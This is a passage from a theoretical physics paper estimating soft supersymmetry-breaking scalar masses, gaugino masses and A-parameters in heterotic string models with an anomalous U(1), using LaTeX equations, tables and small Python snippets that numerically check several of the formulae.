where $M=M_{Pl}/\sqrt{8\pi}$ with $M_{Pl}$ being the Planck mass, and is
referred to as the gravitational scale.
We have denoted scalar fields in the chiral multiplets by $\phi^I$
and their complex conjugate by $\bar \phi_J$.
The scalar potential is given by
\begin{eqnarray}
V &=& M^{2}e^{G/M^{2}} (G_I (G^{-1})^I_J G^J-3M^{2})
+ \frac{1}{2} (Re f^{-1})_{\alpha \beta} \hat D^{\alpha} \hat D^{\beta}
\label{scalar-potential}
\end{eqnarray}
where
\begin{eqnarray}
\hat D^\alpha = G_I ( T^\alpha \phi)^I = (\bar \phi T^\alpha)_J G^J.
\label{hatD}
\end{eqnarray}
Here $G_I=\partial G/\partial \phi^I$,
$G^J=\partial G/\partial \bar \phi_J$ etc, and
$T^\alpha$ are gauge transformation generators.
Also in the above, $(Re f^{-1})_{\alpha \beta}$ and
$(G^{-1})^I_J$ are the inverse matrices of $Re f_{\alpha \beta}$ and
$G^I_J$, respectively, and a summation over $\alpha$,... and $I$,... is
understood.
The last equality in Eq.(\ref{hatD}) comes from the
gauge invariance of the total K\"ahler potential.
The $F$-auxiliary fields of the chiral multiplets are given by
\begin{equation}
F^I =Me^{G/2M^{2}} (G^{-1})^I_J G^J.
\label{F}
\end{equation}
The $D$-auxiliary fields of the vector multiplets are given by
\begin{equation}
D^{\alpha} = (Re f^{-1})_{\alpha\beta} \hat{D}^{\beta}.
\label{D}
\end{equation}
Using $F^I$ and $D^\alpha$, the scalar potential is rewritten down by
\begin{eqnarray}
V &=& V_F + V_D , \nonumber \\
V_F &\equiv& F_I K^I_J F^J - 3M^{4} e^{G/M^{2}} ,
\label{VF}\\
V_D &\equiv& \frac{1}{2} Re f_{\alpha \beta} D^{\alpha} D^{\beta}.
\label{scalar-potential 2}
\end{eqnarray}
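As a consistency check of the $F$-term potential above, one can verify numerically that Eq.(\ref{VF}) reproduces the familiar form $e^{K}(|D_\phi W|^2 - 3|W|^2)$ with $D_\phi W = W_\phi + K_\phi W$. The sketch below does this for a toy one-field model in units $M=1$; the choice of $K$, $W$ and the sample point are illustrative assumptions, not taken from any specific model.

```python
import cmath

# Spot-check of the F-term potential for a toy one-field model in units M = 1:
# canonical Kahler potential K = phi*phib and W = w0 + m*phi^2/2 (both assumed).
def VF_two_ways(phi, w0=1.0, m=0.5):
    phib = phi.conjugate()
    K = (phi*phib).real
    W = w0 + m*phi**2/2
    Wb = W.conjugate()

    # V_F = e^G (G_I (G^-1)^I_J G^J - 3), with e^G = e^K |W|^2 and K^phi_phi = 1
    G_phi = phib + m*phi/W                  # G_I = K_I + W_I/W
    G_phib = G_phi.conjugate()
    VF = cmath.exp(K)*abs(W)**2*(G_phi*G_phib - 3)

    # textbook form: e^K (|D W|^2 - 3|W|^2) with D W = W' + K_phi W
    DW = m*phi + phib*W
    VF_std = cmath.exp(K)*(abs(DW)**2 - 3*abs(W)**2)
    return VF.real, VF_std.real

v1, v2 = VF_two_ways(0.3 + 0.4j)
assert abs(v1 - v2) < 1e-12   # the two expressions agree to machine precision
```

The agreement is exact because $|W|^2|G_\phi|^2 = |W K_\phi + W_\phi|^2 = |D_\phi W|^2$, term by term.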
Let us next summarize our assumptions on SUSY breaking.
The gravitino mass $m_{3/2}$ is given by
\begin{equation}
m_{3/2}= \langle Me^{G/2M^{2}} \rangle
\label{gravitino}
\end{equation}
where $\langle \cdots \rangle$ denotes the VEV.
As a phase convention, it is taken to be real.
We identify the gravitino mass with the weak scale in most cases.
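To get a feel for the numbers, one can invert Eq.(\ref{gravitino}) to see how large $\langle G \rangle$ must be for a weak-scale gravitino; the target value of $m_{3/2}$ below is our illustrative assumption, not a prediction of the text.

```python
import math

# Invert m_{3/2} = M exp(<G>/2M^2) for an assumed weak-scale gravitino mass.
M_pl = 1.221e19                      # Planck mass in GeV
M = M_pl / math.sqrt(8*math.pi)      # gravitational scale M = M_Pl/sqrt(8 pi)

m32 = 100.0                          # assumed gravitino mass at the weak scale, GeV
G_over_M2 = 2*math.log(m32/M)        # <G>/M^2 needed to realize this m_{3/2}
print(f"M = {M:.2e} GeV, <G>/M^2 = {G_over_M2:.1f}")
```

The required $\langle G \rangle/M^2 \simeq -75$ illustrates the large hierarchy between the weak scale and the gravitational scale that any SUSY breaking mechanism must generate.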
It is assumed that SUSY is spontaneously broken by some $F$-term condensations
($\langle F \rangle \neq 0$) for singlet fields under
the standard model gauge group
and/or some $D$-term condensations ($\langle D \rangle \neq 0$)
for broken gauge symmetries.
We require that the VEVs of $F^I$ and $D^{\alpha}$ should satisfy
\begin{eqnarray}
&~& \langle (F_I K^I_J F^J)^{1/2} \rangle \leq O(m_{3/2}M) ,
\label{VEV-F} \\
&~& \langle D^\alpha \rangle \leq O(m_{3/2}M)
\label{VEV-D}
\end{eqnarray}
for each pair $(I,J)$ in Eq.(\ref{VEV-F}).
Note that we allow the non-zero vacuum energy $\langle V \rangle$
of order $m_{3/2}^2 M^2$ at this level, which could be canceled
by quantum corrections.
In order to discuss the magnitudes of several quantities, it is
necessary to see consequences of the stationary condition
$\langle \partial V /\partial \phi^I \rangle =0$. From
Eq.(\ref{scalar-potential}), we find
\begin{eqnarray}
\partial V /\partial \phi^I &=& G_I ( {V_F \over M^2}
+ M^{2}e^{G/M^{2}} ) + M e^{G/2M^{2}} G_{IJ} F^J \nonumber \\
&~& - F_{I'} G^{I'}_{J'I} F^{J'}
- \frac{1}{2} (Re f_{\alpha \beta}),_I D^\alpha D^\beta
\nonumber \\
&~& + D^\alpha (\bar \phi T^\alpha )_J G^J_I .
\label{VI}
\end{eqnarray}
Taking its VEV and using the stationary condition, we derive the formula
\begin{eqnarray}
m_{3/2} \langle G_{IJ} \rangle \langle F^J \rangle &=&
- \langle G_I \rangle ( {\langle V_F \rangle \over M^2} + m_{3/2}^2 )
+ \langle F_{I'} \rangle \langle G^{I'}_{J'I} \rangle
\langle F^{J'} \rangle
\nonumber \\
&~& + \frac{1}{2} \langle (Re f_{\alpha \beta}),_I \rangle
\langle D^\alpha \rangle \langle D^\beta \rangle
- \langle D^\alpha \rangle \langle (\bar \phi T^\alpha )_J \rangle
\langle G^J_I \rangle .
\label{<VI>}
\end{eqnarray}
We can estimate the magnitude of SUSY mass parameter
$\mu_{IJ} \equiv m_{3/2} (\langle G_{IJ} \rangle + \langle G_{I} \rangle
\langle G_{J} \rangle/M^2 - \langle G_{I'} (G^{-1})^{I'}_{J'}
G^{J'}_{IJ} \rangle)$ using Eq.(\ref{<VI>}).
By multiplying $(T^\alpha \phi)^I$ to Eq.(\ref{VI}),
a heavy-real direction is projected on.
Using the identities derived from the gauge
invariance of the total K\"ahler potential
\begin{eqnarray}
& & G_{IJ}(T^\alpha \phi)^J + G_J (T^\alpha )_I^J
- K^J_I(\bar \phi T^\alpha)_J = 0,
\\
& & K_{IJ'}^J (T^\alpha \phi)^{J'} + K^J_{J'} (T^\alpha)^{J'}_I
-[G^{J'} (\bar \phi T^\alpha )_{J'}]_I^J = 0,
\end{eqnarray}
we obtain
\begin{eqnarray}
{\partial V \over \partial \phi^I} (T^\alpha \phi)^I &=&
( {V_F \over M^2} + 2 M^2 e^{G/M^2} ) \hat D^\alpha
- F_I F^J (\hat{D}^{\alpha})^I_J
\nonumber \\
&~& - \frac{1}{2} (Re f_{\beta \gamma}),_I (T^\alpha \phi)^I
D^\beta D^\gamma
+ (\bar \phi T^\beta)_J G^J_I (T^\alpha \phi)^I D^\beta .
\label{VI2}
\end{eqnarray}
Taking its VEV and using the stationary condition,
we derive the formula
\begin{eqnarray}
&~& \{ {(M_V^2)^{\alpha\beta} \over 2g_\alpha g_\beta}
+ ({\langle V_F \rangle \over M^2} + 2 m_{3/2}^2)
\langle Re f_{\alpha\beta} \rangle \} \langle D^\beta \rangle
= \langle F_I \rangle \langle F^J \rangle
\langle (\hat{D}^{\alpha})^I_J \rangle \nonumber \\
&~& ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ \frac{1}{2} \langle (Re f_{\beta \gamma}),_I \rangle
\langle (T^\alpha \phi)^I \rangle
\langle D^\beta \rangle \langle D^\gamma \rangle
\label{<VI2>}
\end{eqnarray}
where $(M_{V}^{2})^{\alpha \beta}=
2g_\alpha g_\beta \langle (\bar \phi T^\beta)_J K^J_I
(T^\alpha \phi)^I \rangle$
is the mass matrix of the gauge bosons and
$g_\alpha$ and $g_\beta$ are the gauge coupling constants.
Using Eq.(\ref{<VI2>}), we can estimate the magnitude of
$D$-term condensations $\langle D^\beta \rangle$.
Using the scalar potential and gauge kinetic terms,
we can obtain formulae of soft
SUSY breaking scalar masses $(m^2)_I^J$, soft SUSY breaking
gaugino masses $M_{\alpha}$ and $A$-parameters $A_{IJK}$ \cite{KMY2,Kawa1},
\begin{eqnarray}
(m^2)^J_I &=& (m^2_F)^J_I + (m^2_D)^J_I , \\
(m^2_F)^J_I &\equiv& (m_{3/2}^2 + {\langle V_F \rangle \over M^2})
\langle K^J_I \rangle \nonumber \\
& & + \langle {F}^{I'} \rangle
\langle ({K}_{I'I}^{I"} (K^{-1})^{J"}_{I"}
{K}^{JJ'}_{J"} - {K}_{I'I}^{J'J}) \rangle \langle {F}_{J'} \rangle + \cdots
\label{mF} ,\\
(m^2_D)^J_I &\equiv& \sum_{\hat{\alpha}} q^{\hat{\alpha}}_{I}
\langle D^{\hat{\alpha}} \rangle \langle K^J_I \rangle ,
\label{mD} \\
M_\alpha &=& \langle F^I \rangle \langle (Re f_\alpha)^{-1} \rangle
\langle f_\alpha,_I \rangle
\label{Ma} ,\\
A_{IJK} &=& \langle F^{I'} \rangle (\langle f_{IJK},_{I'} \rangle
+ {\langle K_{I'} \rangle \over M^2} \langle f_{IJK} \rangle
\nonumber \\
&~& - \langle K_{(II'}^{J'} \rangle \langle (K^{-1})_{J'}^{J"} \rangle
\langle f_{J"JK)} \rangle )
\label{A}
\end{eqnarray}
where the index $\hat{\alpha}$ runs over broken gauge generators,
$Re f_\alpha \equiv Re f_{\alpha\alpha}$ and $f_{IJK}$'s are Yukawa
couplings some of which are moduli-dependent.
The $(I \cdots JK)$ in Eq.(\ref{A}) stands for a cyclic permutation
among $I$, $J$ and $K$.
The ellipsis in $(m^2_F)^J_I$ stands for extra $F$-term contributions
and so forth.
The $(m^2_D)^J_I$ is a $D$-term contribution
to scalar masses.
\section{Heterotic string model with anomalous $U(1)$}
Effective SUGRA is derived from 4D string models taking a field
theory limit.
In this section, we study soft SUSY breaking parameters
in SUGRA from heterotic string model with $U(1)_A$.\footnote{
Based on the assumption that SUSY is broken by $F$-components of
$S$ and/or a moduli field, properties of
soft SUSY breaking scalar masses have been studied in Ref.\cite{N,KK}.}
Let us explain our starting point and assumptions first.
The gauge group $G=G_{SM} \times U(1)_A$ originates from the
breakdown of $E_8 \times E_8'$ gauge group.
Here $G_{SM}$ is a standard model gauge group
$SU(3)_C \times SU(2)_L \times U(1)_Y$ and $U(1)_A$ is an anomalous $U(1)$
symmetry.
The anomaly is canceled by the Green-Schwarz mechanism \cite{GS}.
Chiral multiplets are classified into two categories.
One is a set of $G_{SM}$ singlet fields which the dilaton field
$S$, the moduli fields $M^i$ and
some of matter fields $\phi^m$ belong to.
The other one is a set of $G_{SM}$ non-singlet
fields $\phi^k$.
We denote two types of matter multiplet as
$\phi^\lambda = \{\phi^m, \phi^k\}$ .
The dilaton field $S$ transforms as
$S \rightarrow S-i\delta_{GS}^{A} M \theta(x)$ under $U(1)_A$
with a space-time dependent parameter $\theta(x)$.
Here $\delta_{GS}^{A}$ is so-called Green-Schwarz coefficient
of $U(1)_A$ and is given by
\begin{eqnarray}
\delta_{GS}^{A} &=& {1 \over 96\pi^2}Tr Q^A
= {1 \over 96\pi^2} \sum_{\lambda} q^A_{\lambda} ,
\label{delta_GS}
\end{eqnarray}
where $Q^A$ is a $U(1)_A$ charge operator,
$q^A_{\lambda}$ is a $U(1)_A$ charge of $\phi^{\lambda}$
and the Kac-Moody level of $U(1)_A$ is rescaled as $k_A=1$.
We find $|\delta_{GS}^{A}/q^A_m| = O(10^{-1}) \sim O(10^{-2})$
in explicit models \cite{KN,KKK}.
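As a numerical illustration of how the quoted range $|\delta_{GS}^{A}/q^A_m| = O(10^{-1}) \sim O(10^{-2})$ arises, one can evaluate $\delta_{GS}^{A} = {\rm Tr}\, Q^A/96\pi^2$ for a hypothetical charge assignment; the charge list below is invented for illustration and is not taken from the models of Refs.\cite{KN,KKK}.

```python
import math

# Green-Schwarz coefficient delta_GS^A = Tr Q^A / (96 pi^2) for an invented
# U(1)_A charge assignment (illustrative only).
charges = [1]*16 + [2]*12            # hypothetical q^A_lambda for the chiral fields
trQ = sum(charges)                   # Tr Q^A = 40

delta_GS = trQ / (96*math.pi**2)
q_m = 1                              # typical matter charge, assumed
print(delta_GS, delta_GS/q_m)        # ~0.042, inside the quoted O(10^-1)-O(10^-2) range
```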
The requirement of $U(1)_A$ gauge invariance yields the form
of K\"ahler potential $K$ as,
\begin{eqnarray}
K &=& K(S + {\bar S} + \delta_{GS}^{A} V_A, M^i, {\bar M}^i,
{\bar \phi}_\mu e^{q^A_\mu V_A}, \phi^\lambda)
\label{K-st}
\end{eqnarray}
up to the dependence on $G_{SM}$ vector multiplets.
We assume that derivatives of the K\"ahler potential $K$ with respect to
fields including
moduli fields or matter fields are at most of order unity
in the units where $M$ is taken to be unity.
However we do not specify the magnitude of
derivatives of $K$ by $S$ alone.
The VEVs of $S$ and $M^i$ are supposed to be
fixed non-vanishing values by some non-perturbative effects.
It is expected that the stabilization of $S$ is
due to the physics at the gravitational scale $M$
or at the lower scale than $M$.
Moreover we assume that the VEV is much bigger than
the weak scale, i.e., $O(m_{3/2}) \ll \langle K_S \rangle$.
The non-trivial transformation property of $S$
under $U(1)_A$ implies that $U(1)_A$ is broken down at some high energy
scale $M_I$.
Hereafter we consider only the case with overall modulus
field $T$ for simplicity.
It is straightforward to apply our method to more complicated
situations with multi-moduli fields.
The K\"ahler potential is, in general, written by
\begin{eqnarray}
K &=& K^{(S)}(S + {\bar S} + \delta_{GS}^{A} V_A) +
K^{(T)}(T + {\bar T}) + K^{(S, T)}
\nonumber\\
&~& + \sum_{\lambda, \mu} ( s_{\lambda}^{\mu}(S + {\bar S}
+ \delta_{GS}^{A} V_A)
+ t_{\lambda}^{\mu}(T + {\bar T}) + u_{\lambda}^{{\mu}(S,T)} )
\phi^\lambda {\bar \phi}_\mu + \cdots
\label{K-st2}
\end{eqnarray}
where $K^{(S, T)}$ and $u_{\lambda}^{{\mu}(S,T)}$ are mixing terms between
$S$ and $T$.
The magnitudes of $\langle K^{(S, T)} \rangle$,
$\langle s_{\lambda}^{\mu} \rangle$ and
$\langle u_{\lambda}^{{\mu}(S,T)} \rangle$
are assumed to be $O(\epsilon_1 M^2)$, $O(\epsilon_2)$ and $O(\epsilon_3)$
where $\epsilon_n$'s ($n=1,2,3$) are model-dependent parameters
whose orders are expected not to be more than one.\footnote{
The existence of $s_{\lambda}^{\mu} \phi^\lambda {\bar \phi}_\mu$
term in $K$
and its contribution to soft scalar masses are discussed in
4D effective theory derived through the standard embedding
from heterotic M-theory \cite{het/M}.}
We estimate the VEV of derivatives of $K$
in the form including $\epsilon_n$.
For example, $\langle K^\mu_{\lambda S} \rangle \leq O(\epsilon_p/M)$
($p=2,3$).
Our consideration is applicable to models in which some of $\phi^\lambda$
are composite fields made of original matter multiplets in string
models if the K\"ahler potential meets the above requirements.
Using the K\"ahler potential (\ref{K-st2}), $\hat{D}^A$ is given by
\begin{eqnarray}
\hat{D}^A &=& -K_S \delta_{GS}^{A} M
+ \sum_{\lambda, \mu} K_\lambda^\mu {\bar \phi}_\mu (q^A \phi)^\lambda
+ \cdots .
\label{D-st}
\end{eqnarray}
The breaking scale of $U(1)_A$ defined by
$M_I \equiv |\langle \phi^m \rangle|$ is estimated as
$M_I = O((\langle K_S \rangle \delta^A_{GS} M/q^A_m)^{1/2})$
from the requirement $\langle D^A \rangle \leq O(m_{3/2} M)$.
We require that $M_I$ be equal to or less than $M$,
and then we find that the VEV of $K_S$ has an upper bound such as
$\langle K_S \rangle \leq O(q^A_m M/\delta^A_{GS})$.
The $U(1)_A$ gauge boson mass squared $(M_{V}^{2})^A$ is given by
\begin{eqnarray}
(M_{V}^{2})^A = 2 g_A^2 \{ \langle K^S_S \rangle (\delta_{GS}^A M)^2
+ \sum_{m, n} q^A_m q^A_n
\langle K^{n}_{m} \rangle
\langle \phi^m \rangle \langle {\bar \phi}_n \rangle \}
\label{MV2A}
\end{eqnarray}
where $g_A$ is a $U(1)_A$ gauge coupling constant.
The magnitude of $(M_{V}^{2})^A/g_A^2$ is estimated as
$Max(O(\langle K^S_S \rangle (\delta^A_{GS} M)^2), O(q^{A2}_m M_I^2))$.
We assume that the magnitude of $(M_{V}^{2})^A/g_A^2$ is
$O(q^{A2}_m M_I^2)$.
It leads to the inequality
$\langle K^S_S \rangle \leq O((q^{A}_m M_I/\delta^{A}_{GS} M)^2)$.
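A quick numerical sketch, in units $M=1$ and with illustrative input values of our own choosing, shows that the estimate $M_I = O((\langle K_S \rangle \delta^A_{GS} M/q^A_m)^{1/2})$ is consistent with the assumption that the matter term dominates $(M_V^2)^A$:

```python
import math

# Order-of-magnitude check in units M = 1; all inputs are illustrative assumptions.
K_S   = 1.0     # <K_S>, taken O(M)
K_SS  = 1.0     # <K^S_S>
delta = 0.04    # Green-Schwarz coefficient delta_GS^A
q_m   = 1.0     # U(1)_A charge of phi^m

M_I = math.sqrt(K_S*delta/q_m)       # U(1)_A breaking scale from <D^A> <= O(m_{3/2} M)

# the two contributions to (M_V^2)^A / (2 g_A^2)
dilaton_term = K_SS*delta**2         # <K^S_S> (delta_GS^A M)^2
matter_term  = (q_m*M_I)**2          # q_m^2 M_I^2
print(M_I, dilaton_term, matter_term)
```

With these inputs $M_I \sim 0.2\,M < M$ and $q_m^2 M_I^2$ exceeds $\langle K^S_S \rangle (\delta^A_{GS} M)^2$ by an order of magnitude, as assumed in the text.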
The formula of soft SUSY breaking scalar masses on $G_{SM}$ non-singlet
fields is given by \cite{KK}
\begin{eqnarray}
(m^2)^k_l &=& (m_{3/2}^2 + {\langle V_F \rangle \over M^2})
\langle K^k_l \rangle
+ \langle {F}^{I} \rangle \langle {F}_{J} \rangle
(\langle R_{Il}^{Jk} \rangle + \langle X_{Il}^{Jk} \rangle) , \\
\langle R_{Il}^{Jk} \rangle &\equiv&
\langle ({K}_{Il}^{I'} (K^{-1})^{J'}_{I'}
{K}^{kJ}_{J'} - {K}_{Il}^{Jk}) \rangle , \\
\langle X_{Il}^{Jk} \rangle &\equiv&
q^A_k ((M^2_V)^A)^{-1} \langle ({\hat D}^A)_I^J \rangle
\langle K^k_l \rangle.
\end{eqnarray}
Here we neglect extra $F$-term contributions and so forth
since they are model-dependent.
The neglect of extra $F$-term contributions is justified
if Yukawa couplings between heavy and light fields
are small enough and the $R$-parity violation is also tiny enough.
We have used Eq.(\ref{<VI2>}) to derive the part related to
$D$-term contribution.
Note that the last term in r.h.s. of Eq.(\ref{<VI2>}) is negligible
when $(M_{V}^{2})^A/g_A^2$ is much bigger than $m_{3/2}^2$.
Using the above mass formula, the magnitudes of
$\langle R_{Il}^{Jk} \rangle$ and
$\langle X_{Il}^{Jk} \rangle$ are estimated and given in Table 1.
Here we assume $q^A_k/q^A_m = O(1)$.
\begin{table}
\caption{The magnitudes of $\langle R_{Il}^{Jk} \rangle$ and
$\langle X_{Il}^{Jk} \rangle$}
\begin{center}
\begin{tabular}{|c|l|l|}
\hline
$(I,J)$ & $\langle R_{Il}^{Jk} \rangle$ & $\langle X_{Il}^{Jk} \rangle$ \\
\hline\hline
$(S,S)$ & $O(\epsilon_p/M^2)$ &
$Max(O(\langle K^S_{SS} \rangle/\langle K_{S} \rangle),
O(\epsilon_p/M^2))$ \\ \hline
$(T,T)$ & $O(1/M^2)$
& $Max(O(\epsilon_1/(\langle K_{S} \rangle M)),
O(1/M^2))$ \\ \hline
$(m,m)$ & $O(1/M^2)$ & $O(1/M_I^2)$ \\ \hline
$(S,T)$ & $O(\epsilon_p/M^2)$
& $Max(O(\epsilon_1/(\langle K_{S} \rangle M)),
O(\epsilon_3/M^2))$ \\ \hline
$(S,m)$ & $O(\epsilon_p M_I/M^3)$
& $Max(O(\epsilon_p/(\langle K_{S} \rangle M)),
O(\epsilon_p/(M M_I)))$ \\ \hline
$(T,m)$ & $O(M_I/M^3)$
& $Max(O(\epsilon_3/(\langle K_{S} \rangle M)),
O(1/(M M_I)))$ \\ \hline
\end{tabular}
\end{center}
\end{table}
Now we obtain the following generic features on $(m^2)^k_l$.\\
(1) The order of magnitude of $\langle X_{Il}^{Jk} \rangle$ is
equal to or bigger than that of $\langle R_{Il}^{Jk} \rangle$
except for an off-diagonal part $(I,J)=(S,T)$.
Hence {\it the magnitude of $D$-term contribution is comparable to
or bigger than that of $F$-term contribution except for the universal part}
$(m_{3/2}^2 + \langle V_F \rangle/M^2)\langle K_l^k \rangle$.\\
(2) In the case where the magnitude of $\langle F_m \rangle$ is bigger than
$O(m_{3/2} M_I)$ and $M > M_I$,
we get the inequality $(m^2_D)_k > O(m_{3/2}^2)$ since the magnitude of
$\langle \hat{D}^A \rangle$ is bigger than $O(m_{3/2}^2)$.\\
(3) In order to get the inequality $O((m^2_F)_k) > O((m^2_D)_k)$, the
following conditions must be satisfied simultaneously,
\begin{eqnarray}
&~& \langle F_T \rangle, \langle F_m \rangle \ll O(m_{3/2} M) ,~~
\langle F_S \rangle = O({m_{3/2} M \over \langle K^S_S \rangle^{1/2}})
\nonumber \\
&~& {M^2 \langle K^S_{SS} \rangle \over \langle K_S \rangle
\langle K^S_S \rangle} < O(1) ,~~
{\epsilon_p \over \langle K^S_S \rangle} < O(1) ,~~(p=2,3)
\label{conditions}
\end{eqnarray}
unless an accidental cancellation among
terms in $\langle \hat{D}^A \rangle$ happens.
To fulfill the condition $\langle F_{T,m} \rangle \ll O(m_{3/2} M)$,
a cancellation among various terms including $\langle K_{I} \rangle$ and
$\langle M^2 W_{I} / W \rangle$ is required.
Note that the magnitudes of
$\langle K_{T} \rangle$ and $\langle K_{m} \rangle$
are estimated as $O(M)$ and $O(M_I)$, respectively.
The gauge kinetic function is given by
\begin{eqnarray}
f_{\alpha\beta} = k_\alpha {S \over M}\delta_{\alpha\beta}
+ \epsilon_\alpha {T \over M}\delta_{\alpha\beta}
+ f_{\alpha\beta}^{(m)}(\phi^\lambda)
\label{f}
\end{eqnarray}
where $k_{\alpha}$'s are Kac-Moody levels
and $\epsilon_\alpha$ is a model-dependent parameter \cite{epsilon}.
The gauge coupling constants $g_\alpha$'s are related to the
real part of gauge kinetic functions such that
$g_\alpha^{-2} = \langle Re f_{\alpha\alpha} \rangle$.
The magnitudes of gaugino masses and $A$-parameters
in MSSM particles are estimated using the formulae
\begin{eqnarray}
M_a &=& \langle F^I \rangle \langle h_{aI} \rangle
\label{Ma2} ,\\
\langle h_{aI} \rangle &\equiv& \langle Re f_a \rangle^{-1}
\langle f_a,_I \rangle \\
A_{kll'} &=& \langle F^I \rangle \langle a_{kll'I} \rangle
\label{A2}, \\
\langle a_{kll'I} \rangle &\equiv& \langle f_{kll'},_I \rangle
+ {\langle K_I \rangle \over M^2} \langle f_{kll'} \rangle
- \langle K_{(kI}^{I'} \rangle \langle (K^{-1})_{I'}^J \rangle
\langle f_{Jll')} \rangle .
\end{eqnarray}
The result is given in Table 2.
Here we assume that $g_\alpha^{-2} = O(1)$.
\begin{table}
\caption{The magnitudes of $\langle h_{aI} \rangle$
and $\langle a_{kll'I} \rangle$}
\begin{center}
\begin{tabular}{|c|l|l|}
\hline
$I$ & $\langle h_{aI} \rangle$ & $\langle a_{kll'I} \rangle$
\\ \hline\hline
$S$ & $O(1/M)$ &
$Max(O(\langle K_{S} \rangle/M^2), O(\epsilon_p/M))$ \\ \hline
$T$ & $O(\epsilon_\alpha/M)$ & $O(1/M)$ \\ \hline
$m$ & $O(M_I/M^2)$ & $O(M_I/M^2)$ \\ \hline
\end{tabular}
\end{center}
\end{table}
In the case where SUSY is broken by a mixture of $S$, $T$ and matter
$F$-components such that
$\langle (K^S_S)^{1/2} F_S \rangle$, $\langle F_T \rangle$,
$\langle F_m \rangle= O(m_{3/2} M)$ ,
we get the following relations among soft SUSY breaking parameters
\begin{eqnarray}
(m^2)_k &\geq& (m^2_D)_k = O(m_{3/2}^2 {M^2 \over M_I^2}) \geq
(A_{kll'})^2 = O(m_{3/2}^2) ,
\label{Mix-rel1}\\
(M_a)^2 &=& O(m_{3/2}^2) \cdot Max(O({\langle K^S_S \rangle}^{-1}),
O(\epsilon_\alpha^2), O({M_I^2 \over M^2})) .
\label{Mix-rel2}
\end{eqnarray}
Finally we discuss the three special cases of SUSY breaking scenario.
\begin{enumerate}
\item In the dilaton dominant SUSY breaking scenario
\begin{eqnarray}
\langle (K^S_S)^{1/2} F_S \rangle = O(m_{3/2} M) \gg
\langle F_T \rangle, \langle F_m \rangle ,
\label{S-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2) \cdot Max(O(1), O({M^2 \langle K^S_{SS} \rangle
\over \langle K^S_S \rangle \langle K_S \rangle}),
O({\epsilon_p \over \langle K^S_S \rangle})) , \nonumber \\
M_a &=& O({m_{3/2} \over \langle K^S_S \rangle^{1/2}}) , ~~~
A_{kll'} = O(m_{3/2}) \cdot Max(O({\langle K_{S} \rangle \over M}),
O(\epsilon_p)) . \nonumber
\end{eqnarray}
Hence we have a relation such that $O((m^2)_k) \geq O((A_{kll'})^2)$.
As discussed in Ref.\cite{model-dep1}, gauginos can be heavier than
scalar fields if $\langle K^S_S \rangle$ is small enough and
$O(M^2 \langle K^S_{SS} \rangle) < O(\langle K_S \rangle)$.
In this case, dangerous flavor changing neutral current
(FCNC) effects from squark mass non-degeneracy are avoided
because the radiative correction
due to gauginos dominates in scalar masses at the weak scale.
On the other hand, in Ref.\cite{model-dep2},
it is shown that gauginos are much lighter than
scalar fields from the requirement of
the condition of vanishing vacuum energy
in the SUGRA version of model proposed in Ref.\cite{BD}.
In appendix, we discuss the relations among the magnitudes of
$\langle K_S \rangle$, $\langle K^S_S \rangle$ and
$\langle K^S_{SS} \rangle$ under some assumptions.
\item In the moduli dominant SUSY breaking scenario
\begin{eqnarray}
\langle F_T \rangle = O(m_{3/2} M) \gg
\langle (K^S_S)^{1/2} F_S \rangle, \langle F_m \rangle ,
\label{T-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2) \cdot Max(O(1), O({\epsilon_1 M \over
\langle K_S \rangle})) ,\nonumber \\
M_a &=& O(\epsilon_\alpha m_{3/2}) , ~~~
A_{kll'} = O(m_{3/2}) . \nonumber
\end{eqnarray}
Hence we have a relation such that
$O((m^2)_k) \geq O((A_{kll'})^2) \geq O((M_a)^2)$.
The magnitude of $\mu_{TT}$ is estimated as $\mu_{TT} = O(m_{3/2})$.
\item In the matter dominant SUSY breaking scenario
\begin{eqnarray}
\langle F_m \rangle = O(m_{3/2} M) \gg
\langle (K^S_S)^{1/2} F_S \rangle, \langle F_T \rangle ,
\label{matter-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2 {M^2 \over M_I^2}) , ~~~
M_a, A_{kll'} = O(m_{3/2} {M_I \over M}) . \nonumber
\end{eqnarray}
The relation $(m^2)_k \gg O((M_a)^2) = O((A_{kll'})^2)$
is derived when $M \gg M_I$.
The magnitude of $\mu_{mn}$ is estimated as
$\mu_{mn} = O(m_{3/2} M/M_I)$.
This value is consistent with that in Ref.\cite{DP}.
\end{enumerate}
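The leading-order scalings of the three scenarios can be compared side by side in a short numerical sketch, in units $m_{3/2} = M = 1$; the input values of $M_I$, $\langle K^S_S \rangle$ and $\epsilon_\alpha$ below are illustrative assumptions only.

```python
# Leading-order soft-term scalings in the three SUSY breaking scenarios,
# in units m_{3/2} = M = 1. All numerical inputs are illustrative.
M_I   = 0.1     # U(1)_A breaking scale in units of M
K_SS  = 1.0     # <K^S_S>
eps_a = 0.1     # epsilon_alpha in the gauge kinetic function

scenarios = {
    # scenario: (scalar mass^2, gaugino mass, A-parameter), leading orders only
    "dilaton": (1.0,        1.0/K_SS**0.5, 1.0),
    "moduli":  (1.0,        eps_a,         1.0),
    "matter":  (1.0/M_I**2, M_I,           M_I),
}

for name, (m2, Ma, A) in scenarios.items():
    print(f"{name:8s} m^2 = {m2:6.1f}   M_a = {Ma:4.2f}   A = {A:4.2f}")
```

With these inputs the matter dominant case gives $(m^2)_k \gg (M_a)^2 = (A_{kll'})^2$, and the moduli dominant case gives $(m^2)_k \geq (A_{kll'})^2 \geq (M_a)^2$, matching the relations quoted above.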
\section{Conclusions}
We have studied the magnitudes of soft SUSY breaking parameters
in heterotic string models with $G_{SM} \times U(1)_A$,
which originates from the breakdown of $E_8 \times E'_8$, and derived
model-independent predictions for them
without specifying SUSY breaking mechanism
and the dilaton VEV fixing mechanism.
In particular, we have made a comparison of magnitudes between
$D$-term contribution to scalar masses and $F$-term ones and
a comparison of magnitudes among scalar masses, gaugino masses
and $A$-parameters
under the condition that $O(m_{3/2}) \ll \langle K_S \rangle \leq
O(q^A_m M/\delta^A_{GS})$, $(M_V^2)^A/g_A^2 = O(q^{A2}_m M_I^2)$
and $\langle V \rangle \leq O(m_{3/2}^2 M^2)$.
The order of magnitude of $D$-term contribution of $U(1)_A$
to scalar masses is comparable to
or bigger than that of $F$-term contribution $\langle F^I \rangle
\langle F_J \rangle \langle R_{Il}^{Jk} \rangle$
except for the universal part
